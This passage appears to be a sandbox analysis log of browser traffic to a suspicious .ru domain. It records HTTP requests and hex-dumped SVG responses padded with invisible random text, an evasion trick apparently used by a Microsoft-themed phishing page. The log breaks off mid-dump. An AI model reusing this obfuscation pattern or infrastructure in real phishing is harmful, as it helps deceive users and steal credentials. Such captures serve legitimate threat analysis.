                                                                                                                                                                                    2024-01-26 13:41:54 UTC452OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6NPonlRNZ/2nXHEFxrXx6mk4 HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:55 UTC722INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:55 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2QQ450gR1%2FMk5kYHstV2tnQ94z1vAY4d8l6dx15iOEJvlZKqrfzVDcBttFWUtZtfOADORx%2Bj2YTt7ahKtT4%2BTtQu1kJZLMrftYhl2aRqigqJEj6m6JWMn3HxOfs4uZ0KHQ9YyF5YsWijg3AazVll2%2FL8qyo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d1b18dc672d-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:55 UTC647INData Raw: 31 38 31 35 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 31 36 22 20 68 65 69 67 68 74 3d 22 31 30 38 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 79 38 55 61 41 6d 73 63 4f 3c 2f 74 65 78 74 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22
                                                                                                                                                                                    Data Ascii: 1815<svg xmlns="http://www.w3.org/2000/svg" width="1916" height="1085" fill="none"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">y8UaAmscO</text><g opacity=".2" clip-path="url(#E)"><text style="
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1369INData Raw: 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 4a 4c 58 72 56 49 47 43 70 3c 2f 74 65 78 74 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36 20 31 30 35 2e 36 30 33 2d 39 35 37 2e 36 20 37 31 34 2d 33 35 32 2e 33 38 20 31 38 31 35 2e 36 20 33 39 34 2e 32 20 31 38 31 35 2e
                                                                                                                                                                                    Data Ascii: <text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">JLXrVIGCp</text><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1369INData Raw: 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 38 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 5a 76 47 6b 55 54 54 56 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e
                                                                                                                                                                                    Data Ascii: "1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(80) scale(1401.6 1720.8)"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">ZvGkUTTV</text><text style="display: in
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1369INData Raw: 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 32 65 49 30 64 6b 44 4e 42 37 34 65 4d 46 37 3c 2f 74 65 78 74 3e 3c 2f 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78
                                                                                                                                                                                    Data Ascii: fset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">2eI0dkDNB74eMF7</text></radialGradient><text style="display: inline; color: #1A7D75; max-width: 0.01px
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1369INData Raw: 3d 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6c 6d 32 74 6d 65 51 64 62 79 78 4a 30 73 67 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37
                                                                                                                                                                                    Data Ascii: ="#d83b01" stop-opacity=".75"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">lm2tmeQdbyxJ0sg</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7
                                                                                                                                                                                    2024-01-26 13:41:55 UTC50INData Raw: 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 4a 42 62 7a 4b 49 64 53 55 59 61 52 6a 69 6c 3c 2f 74 65 78 74 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                    Data Ascii: font-size: 0.02px;">JBbzKIdSUYaRjil</text></svg>
                                                                                                                                                                                    2024-01-26 13:41:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    53192.168.2.1649790172.67.139.1444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:54 UTC455OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6oIPrEsjzA9/2y7aQ7c0EhFH7oS HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:55 UTC722INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:55 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2uYFPXY3brVmz1AQx0npLVRstPXGtvtEwoQcM7wBCUZ6ukB2UNNmLkHIGIzrS33xhbpiJL1HAv%2BPjx6S30%2F4O38ns9p4D2hxS08m4wcZAQXIWyamcK43T9t%2BUGQCM4EeiD9UxhTAk1qGU1Co9TQn7W37E%2Bw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d1b1c1bb0c7-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:55 UTC647INData Raw: 31 38 32 32 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 31 36 22 20 68 65 69 67 68 74 3d 22 31 30 38 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 54 6b 76 79 62 35 41 33 42 54 3c 2f 74 65 78 74 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d
                                                                                                                                                                                    Data Ascii: 1822<svg xmlns="http://www.w3.org/2000/svg" width="1916" height="1085" fill="none"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">Tkvyb5A3BT</text><g opacity=".2" clip-path="url(#E)"><text style=
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1369INData Raw: 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 7a 4b 4a 79 7a 4a 51 52 3c 2f 74 65 78 74 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36 20 31 30 35 2e 36 30 33 2d 39 35 37 2e 36 20 37 31 34 2d 33 35 32 2e 33 38 20 31 38 31 35 2e 36 20 33 39 34 2e 32 20 31 38 31 35 2e 36 7a 22
                                                                                                                                                                                    Data Ascii: ext style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">zKJyzJQR</text><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z"
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1369INData Raw: 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 38 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 51 63 6f 39 41 47 4d 63 6d 52 55 30 74 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70
                                                                                                                                                                                    Data Ascii: r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(80) scale(1401.6 1720.8)"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">Qco9AGMcmRU0t</text><text style="disp
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1369INData Raw: 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 63 6b 61 56 4f 4c 78 3c 2f 74 65 78 74 3e 3c 2f 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20
                                                                                                                                                                                    Data Ascii: text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5ckaVOLx</text></radialGradient><text style="display: inline; color: #1A7D75; max-width:
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1369INData Raw: 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 67 34 54 6f 63 73 77 30 47 69 44 4d 58 4f 48 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65
                                                                                                                                                                                    Data Ascii: op stop-color="#d83b01" stop-opacity=".75"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">g4Tocsw0GiDMXOH</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline
                                                                                                                                                                                    2024-01-26 13:41:55 UTC63INData Raw: 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 79 43 69 6c 59 38 57 6f 70 77 50 44 77 3c 2f 74 65 78 74 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                    Data Ascii: eight: 0.03px; font-size: 0.02px;">yCilY8WopwPDw</text></svg>
                                                                                                                                                                                    2024-01-26 13:41:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    54192.168.2.1649786172.67.139.1444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:54 UTC455OUTGET /VyRsmGftiIlOxrabXBIOtQtS/63Ag6b7lSc/5vOgy6RaRMInSrZ5 HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:55 UTC722INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:55 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ILGZSVHQSB%2FUEy5G3LEIFjvFRoYLPKSTBBn0ZlAEqQbRV8K5xyPXvSwTHWq3BTC6YsYkNfxA26TgAn7T2aOjz%2BMaeoYEc7PW%2BSS9GrDePaamBpv3DczA9BsfJDAhw6iIJjYsl0M7e9F%2Bf8PYpGSDijuOpKU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d1b2f4c450f-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:55 UTC647INData Raw: 31 37 35 31 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 35 31 22 20 51 4f 71 64 6b 68 7a 57 65 79 56 3d 22 55 58 74 59 6d 67 59 57 45 57 68 22 20 20 68 65 69 67 68 74 3d 22 32 36 22 20 76 69 65 77 42 6f 78 3d 22 2d 31 2e 34 34 20 2d 33 20 31 35 31 20 32 34 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 56 6a 6c 47 4b 42 58 53 3c 2f 74 65 78 74 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 38 22
                                                                                                                                                                                    Data Ascii: 1751<svg xmlns="http://www.w3.org/2000/svg" width="151" QOqdkhzWeyV="UXtYmgYWEWh" height="26" viewBox="-1.44 -3 151 24"><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">VjlGKBXS</text><rect x="12.068"
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1369INData Raw: 6d 61 70 47 6f 43 73 6e 66 47 7a 78 71 3d 22 59 7a 64 4e 6b 4f 55 47 6f 57 4a 70 50 22 20 20 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3d 22 30 2e 30 34 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 30 2e 31 22 20 2f 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 30 2e 36 33 32 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 20 77 4f 5a 68 58 53 47 76 61 41 41 65 76 56 48 3d 22 4b 50 42 4b 55 54 4a 51 50 22 20 20 66 69 6c 6c 3d 22 23 46 32 33 44 30 43 22 2f 3e 3c 72 65 63 74 20 78 3d 22 33 30 2e 30 36 38 22 20 79 3d 22 31 32 2e 30 36 38 22 20 20 4f 68 67 51 4a 6e 53 4c 48 72 3d 22 4a 5a 53 48 57 65 65 43 4d 6f 53 45 22 20 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 45 37 41 43
                                                                                                                                                                                    Data Ascii: mapGoCsnfGzxq="YzdNkOUGoWJpP" stroke-opacity="0.04" stroke-width="0.1" /><rect width="10.632" height="10.931" wOZhXSGvaAAevVH="KPBKUTJQP" fill="#F23D0C"/><rect x="30.068" y="12.068" OhgQJnSLHr="JZSHWeeCMoSE" width="10.931" height="10.931" fill="#E7AC
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1369INData Raw: 46 4c 79 6b 61 54 70 64 3d 22 50 61 59 49 76 55 6f 4c 22 20 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 33 35 39 39 46 46 22 2f 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 35 30 2e 39 33 32 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 58 53 6d 4d 6c 45 6d 72 65 52 42 53 3d 22 74 67 46 4e 43 71 7a 47 67 7a 22 20 66 69 6c 6c 3d 22 23 45 33 45 33 45 33 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 20 30 2e 30 35 3b 22 20 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e
                                                                                                                                                                                    Data Ascii: FLykaTpd="PaYIvUoL" height="10.931" fill="#3599FF"/><rect width="50.932" height="10.931" XSmMlEmreRBS="tgFNCqzGgz" fill="#E3E3E3" style="fill-opacity: 0.05;" /><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1369INData Raw: 34 36 37 2c 30 2c 30 2c 30 2d 2e 35 39 32 2c 32 2e 32 32 33 56 31 38 2e 34 48 36 30 2e 35 32 35 56 38 2e 35 30 37 68 32 2e 33 32 39 76 31 2e 35 35 39 68 2e 30 33 38 41 32 2e 37 32 39 2c 32 2e 37 32 39 2c 30 2c 30 2c 31 2c 36 33 2e 38 35 35 2c 38 2e 38 2c 32 2e 36 31 31 2c 32 2e 36 31 31 2c 30 2c 30 2c 31 2c 36 35 2e 34 2c 38 2e 33 34 33 6d 31 2c 35 2e 32 35 34 41 35 2e 33 35 38 2c 35 2e 33 35 38 2c 30 2c 30 2c 31 2c 36 37 2e 37 39 32 2c 39 2e 37 31 61 35 2e 31 2c 35 2e 31 2c 30 2c 30 2c 31 2c 33 2e 38 35 2d 31 2e 34 33 34 2c 34 2e 37 34 32 2c 34 2e 37 34 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 33 2c 31 2e 33 38 31 2c 35 2e 32 31 32 2c 35 2e 32 31 32 2c 30 2c 30 2c 31 2c 31 2e 33 2c 33 2e 37 32 39 2c 35 2e 32 35 37 2c 35 2e 32 35 37 2c 30 2c 30 2c 31 2d 31 2e
